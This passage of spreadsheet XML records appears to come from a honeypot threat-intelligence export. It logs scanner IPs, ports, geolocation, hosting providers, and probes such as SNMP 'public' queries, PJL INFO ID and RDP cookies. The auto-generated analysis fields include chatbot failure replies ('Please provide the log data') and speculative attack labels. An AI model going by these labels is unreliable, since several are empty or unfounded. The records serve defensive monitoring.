    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;389&amp;&amp;21&amp;&amp;53764&amp;&amp;23&amp;&amp;52748&amp;&amp;NA&amp;&amp;14419&amp;&amp;6667&amp;&amp;3389&amp;&amp;143&amp;&amp;51312&amp;&amp;1433&amp;&amp;6379&amp;&amp;1080&amp;&amp;161&amp;&amp;5900&amp;&amp;1521&amp;&amp;9100&amp;&amp;443&amp;&amp;55975&amp;&amp;52570&amp;&amp;445&amp;&amp;110&amp;&amp;3306&amp;&amp;55906&amp;&amp;80&amp;&amp;53307&amp;&amp;63152&amp;&amp;51641&amp;&amp;49973&amp;&amp;61690&amp;&amp;55966&amp;&amp;55212"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2021-12-20"/>
    <s v="PAN-22"/>
    <s v="2021-12-20"/>
    <s v="connection&amp;&amp;command&amp;&amp;request&amp;&amp;GET&amp;&amp;stshash&amp;&amp;query&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_HTTPS:{'Host': 'vmi1321974.contaboserver.net', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ovLybZSIM'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qbKgaD'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,62310)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,62322)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,62324)}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,58628)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,61286)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,61298)}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'text/plain', 'call-id': '0817523826@10.132.0.163', 'contact': 'sip:YvVKooes@10.132.0.163:52105', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:oQwzxXVd@10.132.0.163:52105;tag=03419669', 'max-forwards': '20', 'to': 'sip:cNJWNDao@203.29.241.98', 'user-agent': 'CXrVnPfb', 'via': 'SIP/2.0/UDP 10.132.0.163:52105;branch=DNTNQW.2500735775;received=198.235.24.163;rport;alias'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,63150)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,63160)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,57798)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,64618)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,64634)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pFythnwqb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LvuCWJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VXVriV'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jSCZSoCUd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vtSfCQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nrrdpR'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,60086)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,60088)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,60100)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:18a3"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No recent LDAP activity detected, which could indicate an evasion tactic to avoid detection. The absence of LDAP traffic may suggest an attacker is attempting to remain stealthy. This lack of activity does not necessarily imply malicious intent. &amp;&amp; Unauthorized access attempt via default SNMP community string, potentially leading to information disclosure or unauthorized configuration changes. The accessed OID likely represents the system's hostname or description. This indicates a potential security vulnerability if not properly configured."/>
    <s v="LDAP Attack &amp;&amp; SNMP Scan"/>
  </r>
  <r>
    <x v="54"/>
    <x v="54"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:23:51"/>
    <d v="2025-04-30T21:23:51"/>
    <d v="2025-04-30T21:23:51"/>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d8:9bdc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="55"/>
    <x v="55"/>
    <s v="euphoric.monitoring.internet-measurement.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:17:12"/>
    <d v="2023-10-28T03:24:23"/>
    <d v="2025-04-30T21:17:12"/>
    <n v="469"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Remote Fingerprinting Activity"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_PJL_H45&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_MYSQL_H35&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_ORACLE_H11&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_POP3_H24&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_SOCKS5_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;9100&amp;&amp;1080&amp;&amp;1521&amp;&amp;6379&amp;&amp;445&amp;&amp;443&amp;&amp;161&amp;&amp;57658&amp;&amp;110&amp;&amp;NA&amp;&amp;5432&amp;&amp;23&amp;&amp;25&amp;&amp;3306&amp;&amp;389&amp;&amp;21&amp;&amp;6667&amp;&amp;80&amp;&amp;5900&amp;&amp;59893"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'ips.backscatterer.org': ['unknown']}"/>
    <n v="67"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="2005-08-31"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;query&amp;&amp;GET&amp;&amp;request&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.98,46497)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.98,57441)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.98,37081)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.98,40199)}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.113.33:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'lgqfgcan', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.98;tag=lgqfgcan', 'max-forwards': '0', 'to': 'sip:5.253.40.123', 'via': 'SIP/2.0/UDP 87.236.176.98:5060;branch=z9hG4bKlgqfgcan;received=87.236.176.98;rport=53136'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'onevxijk', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.98;tag=onevxijk', 'max-forwards': '0', 'to': 'sip:38.54.116.162', 'via': 'SIP/2.0/UDP 87.236.176.98:5060;branch=z9hG4bKonevxijk;received=87.236.176.98;rport=44191'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'weicscfc', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.98;tag=weicscfc', 'max-forwards': '0', 'to': 'sip:38.60.209.6', 'via': 'SIP/2.0/UDP 87.236.176.98:5060;branch=z9hG4bKweicscfc;received=87.236.176.98;rport=44387'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:57ec:b062"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="No log data provided."/>
    <s v="There is no log data provided. Please provide the actual log data, and I will be happy to analyze it for you."/>
  </r>
  <r>
    <x v="56"/>
    <x v="56"/>
    <s v="253.red-2-136-118.staticip.rima-tde.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:15:43"/>
    <d v="2025-02-21T00:11:42"/>
    <d v="2025-04-30T21:15:43"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTPS_HC1"/>
    <s v="80&amp;&amp;8443"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="CL"/>
    <s v="Castille and León"/>
    <s v="Segovia"/>
    <s v="Martín Muñoz de la Dehesa"/>
    <s v="3117337"/>
    <s v="NA"/>
    <s v="41.0665"/>
    <s v="-4.68676"/>
    <s v="3352"/>
    <s v="TELEFONICA DE ESPANA S.A.U."/>
    <s v="RIMA (Red IP Multi Acceso)"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-11-05"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_HTTP:{'Accept': 'text/plain,text/html', 'Host': '109.123.229.33', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:288:76fd"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <s v="Nmap Scan &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="57"/>
    <x v="57"/>
    <s v="deliberate.monitoring.internet-measurement.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:15:29"/>
    <d v="2024-12-11T09:20:27"/>
    <d v="2025-04-30T21:15:29"/>
    <n v="274"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_POP3_H28&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_IRC_H12&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_SMTP_H24&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_REDIS_H17&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_SOCKS5_H18"/>
    <s v="110&amp;&amp;6379&amp;&amp;1433&amp;&amp;6667&amp;&amp;21&amp;&amp;25&amp;&amp;445&amp;&amp;5900&amp;&amp;1080&amp;&amp;46855&amp;&amp;5432&amp;&amp;9100&amp;&amp;NA&amp;&amp;1521&amp;&amp;143&amp;&amp;389&amp;&amp;23&amp;&amp;3389&amp;&amp;443"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'ips.backscatterer.org': ['unknown']}"/>
    <n v="147"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="2018-03-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;query&amp;&amp;login&amp;&amp;request&amp;&amp;stshash&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.146.12.172:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'HELP', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'gloctaep', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.89;tag=gloctaep', 'max-forwards': '0', 'to': 'sip:193.57.138.110', 'via': 'SIP/2.0/UDP 185.247.137.89:5060;branch=z9hG4bKgloctaep;received=185.247.137.89;rport=53352'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.89,41629)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.89,43315)}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': ''}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9f7:8959"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is no log data provided for analysis. &amp;&amp; This log data indicates that there is currently no available information regarding malicious activity, as indicated by &quot;NA&quot;."/>
    <s v="I don't see any log data provided. Please provide the log data, and I'll analyze it for you._x000a__x000a_Once I have the data, I can help identify the type of attack in a short phrase (max 2 words). &amp;&amp; FTP Scanning"/>
  </r>
  <r>
    <x v="58"/>
    <x v="58"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:14:18"/>
    <d v="2025-04-30T21:14:18"/>
    <d v="2025-04-30T21:14:18"/>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f:b58f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="59"/>
    <x v="59"/>
    <s v="NA&amp;&amp;prod54client01.academyforinternetresearch.org"/>
    <x v="0"/>
    <d v="2025-04-30T21:11:45"/>
    <d v="2025-04-25T17:22:27"/>
    <d v="2025-04-30T21:11:45"/>
    <n v="90"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Email Spoofing&amp;&amp;Credential_Stuffing_Attack_High"/>
    <s v="high"/>
    <s v="SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_PJL_HC1"/>
    <s v="110&amp;&amp;9100&amp;&amp;8443&amp;&amp;25&amp;&amp;NA&amp;&amp;3306&amp;&amp;80&amp;&amp;1433&amp;&amp;143&amp;&amp;443&amp;&amp;21&amp;&amp;23&amp;&amp;3389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.35208"/>
    <s v="103.82"/>
    <s v="63949"/>
    <s v="Akamai Technologies, Inc."/>
    <s v="LINODE"/>
    <s v="hosting"/>
    <s v="Linode, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;command&amp;&amp;login&amp;&amp;GET"/>
    <s v="{Data_POP3:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTPS:{'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Connection': 'close', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'A001'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': ''}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': ''}}&amp;&amp;{Data_POP3:{'args': '/ RTSP/1.0', 'cmd': 'OPTIONS'}}&amp;&amp;{Data_RDP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8ba2:390"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low&amp;&amp;High"/>
    <s v="The POP3 service was accessed, indicating an attempted unauthorized access to email accounts._x000a_An attacker may be trying to steal sensitive information by accessing user emails._x000a_This activity suggests potential identity theft or spamming attempts. &amp;&amp; This log indicates an unknown or malicious process attempting to execute PJL commands, potentially as part of a printer exploitation attempt. &amp;&amp; No activity detected for POP3 service, normal operation expected unless indicated otherwise. &amp;&amp; Unknown FTP login attempt was made from an unknown IP, suggesting potential unauthorized access or scanning activity. &amp;&amp; The data suggests an attempted connection or scan for the IMAP service, which could be a reconnaissance attempt by malicious actors to identify vulnerable services._x000a_This activity may indicate someone is probing for potential entry points into the network._x000a_It is likely an exploratory action. &amp;&amp; Possible FTP login attempts were made, but details are unavailable due to lack of data. The system detected unknown or unauthorized access attempts through an FTP service. Further investigation is required for a more detailed analysis. &amp;&amp; No incoming mail activity is detected, indicating possible absence or spoofing of a legitimate 